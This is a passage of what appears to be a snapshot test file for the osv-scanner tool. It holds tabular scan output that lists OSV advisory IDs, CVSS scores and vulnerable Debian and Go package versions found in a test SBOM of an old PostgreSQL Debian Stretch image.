testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3600-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3651-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3764-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-17512 | 8.8 | Debian | sensible-utils | 0.0.9+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-20482 | 4.7 | Debian | tar | 1.29b-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-39804 | 6.2 | Debian | tar | 1.29b-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3755-1 | | | | | | | | https://osv.dev/DLA-3051-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3134-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3161-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3366-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3412-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3684-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3788-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3972-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4085-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4105-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4403-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4016-1 | | Debian | ucf | 3.0036 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5055-1 | 5.5 | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5650-1 | 5.5 | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2016-2779 | 7.8 | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-3184 | | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5123-1 | 8.8 | Debian | xz-utils | 5.2.2-1.2+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5895-1 | 8.7 | Debian | xz-utils | 5.2.2-1.2+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-3094 | 10.0 | Debian | xz-utils | 5.2.2-1.2+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | +---------------------------------------+------+-----------+--------------------------------+------------------------------------+-----------------------------------+-------------------------------------------------+ --- [TestCommand_LocalDatabases/one_specific_supported_sbom_with_vulns - 2] --- [TestCommand_LocalDatabases/one_specific_supported_sbom_with_vulns - 3] Scanning dir ./testdata/sbom-insecure/postgres-stretch.cdx.xml Scanned /testdata/sbom-insecure/postgres-stretch.cdx.xml file and found 136 packages Filtered 1 local/unscannable package/s from the scan. Loaded Debian local db from /osv-scanner/Debian/all.zip Loaded Go local db from /osv-scanner/Go/all.zip Total 21 packages affected by 168 known vulnerabilities (18 Critical, 70 High, 53 Medium, 3 Low, 24 Unknown) from 2 ecosystems. 11 vulnerabilities can be fixed. +---------------------------------------+------+-----------+--------------------------------+------------------------------------+-----------------------------------+-------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +---------------------------------------+------+-----------+--------------------------------+------------------------------------+-----------------------------------+-------------------------------------------------+ | https://osv.dev/GO-2022-0274 | 6.0 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.0 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-v95c-p5hm-xq8f | | | | | | | | https://osv.dev/GO-2022-0452 | 5.9 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.2 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-f3fp-gc8g-vw66 | | | | | | | | https://osv.dev/GO-2023-1627 | 7.0 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.5 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-vpvm-3wq2-2wvm | | | | | | | | https://osv.dev/GO-2023-1682 | 2.5 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.5 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-m8cg-xc2p-r3fc | | | | | | | | https://osv.dev/GO-2023-1683 | 6.1 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.5 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-g2j6-57v7-gm8c | | | | | | | | https://osv.dev/GO-2024-2491 | 8.6 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.12 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-xr7r-f8xq-vfvv | | | | | | | | https://osv.dev/GO-2024-3110 | 4.8 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.14 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-jfvp-7x6p-h2pv | | | | | | | | https://osv.dev/GO-2025-4096 | 7.3 | Go | github.com/opencontainers/runc | v1.0.1 | 1.2.8 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-9493-h29p-rfm2 | | | | | | | | https://osv.dev/GO-2025-4097 | 7.3 | Go | github.com/opencontainers/runc | v1.0.1 | 1.2.8 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-qw9x-cqr3-wc7r | | | | | | | | https://osv.dev/GO-2025-4098 | 7.3 | Go | github.com/opencontainers/runc | v1.0.1 | 1.2.8 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-cgrx-mc8f-2prm | | | | | | | | https://osv.dev/GO-2022-0493 | 5.3 | Go | golang.org/x/sys | v0.0.0-20210817142637-7d9622a276b7 | 0.0.0-20220412211240-33da011f77ad | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-p782-xgp4-8hr8 | | | | | | | | https://osv.dev/DSA-4685-1 | 5.5 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4808-1 | 5.7 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0501 | 5.9 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-3462 | 8.1 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3715 | 7.8 | Debian | bash | 4.4-5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2016-2781 | 6.5 | Debian | coreutils | 8.26-3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-0684 | 5.5 | Debian | coreutils | 8.26-3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3482-1 | | Debian | debian-archive-keyring | 2017.5+deb9u2 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5147-1 | 9.8 | Debian | dpkg | 1.18.25 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-6297 | 8.2 | Debian | dpkg | 1.18.25 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-2219 | 7.5 | Debian | dpkg | 1.18.25 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4535-1 | 7.5 | Debian | e2fsprogs | 1.43.4-2+deb9u2 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-5188 | 6.7 | Debian | e2fsprogs | 1.43.4-2+deb9u2 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-1304 | 7.8 | Debian | e2fsprogs | 1.43.4-2+deb9u2 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3910-1 | | | | | | | | https://osv.dev/DSA-5122-1 | 8.8 | Debian | gzip | 1.6-5+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-0379 | 7.5 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-7526 | 6.8 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0495 | 4.7 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-13627 | 6.3 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-33560 | 7.5 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-40528 | 5.9 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5863-1 | 5.3 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-10790 | 7.5 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6003 | 7.5 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-46848 | 9.1 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3263-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2025-13151 | 7.5 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5142-1 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5271-1 | 7.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5391-1 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5990-1 | | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2016-3709 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-2309 | | | | | | | | https://osv.dev/DLA-3878-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2016-9318 | 5.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-0663 | 7.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-15412 | 8.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-16931 | 9.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-16932 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-18258 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-5130 | 8.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-5969 | 4.7 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-7375 | 9.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-7376 | 9.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-8872 | 9.1 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9047 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9048 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9049 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9050 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-14404 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-14567 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-19956 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-20388 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-7595 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3516 | 7.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3517 | 8.6 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3518 | 8.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3537 | 5.9 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3541 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-23308 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-9714 | 5.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4319-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2026-0989 | 3.7 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-0990 | 5.9 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-0992 | 2.9 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4539-1 | 4.7 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4539-3 | | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4661-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4807-1 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4855-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4875-1 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4963-1 | 9.8 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5103-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5139-1 | 7.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5169-1 | 7.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5343-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5417-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5532-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5764-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-6015-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-6113-1 | 9.8 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0732 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0734 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0735 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-5407 | 4.7 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-1543 | 7.4 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-1549 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3450 | 7.4 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-2274 | 9.8 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3358 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3602 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3786 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3996 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-4203 | 4.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-0216 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-0217 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-0401 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-1255 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-2975 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-3446 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-3817 | | | | | | | | https://osv.dev/DLA-3530-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2023-5678 | 9.1 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-0727 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-2511 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-4741 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-5535 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-9143 | | | | | | | | https://osv.dev/DLA-3942-1 | | | | | | | | https://osv.dev/DLA-3942-2 | | | | | | | | https://osv.dev/DEBIAN-CVE-2023-6129 | 6.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-6237 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-12797 | 6.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-13176 | 4.1 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4176-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-4603 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-11187 | 6.1 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-15468 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-15469 | 5.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-4575 | 6.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-66199 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-9231 | 6.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-2673 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5902-1 | 8.4 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-12837 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-12883 | 9.1 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-12015 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18311 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18312 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18313 | 9.1 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18314 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6797 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6798 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6913 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-10543 | 8.2 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-10878 | 8.6 | Debian | perl | 5.24.1-3+deb9u7 | -- | 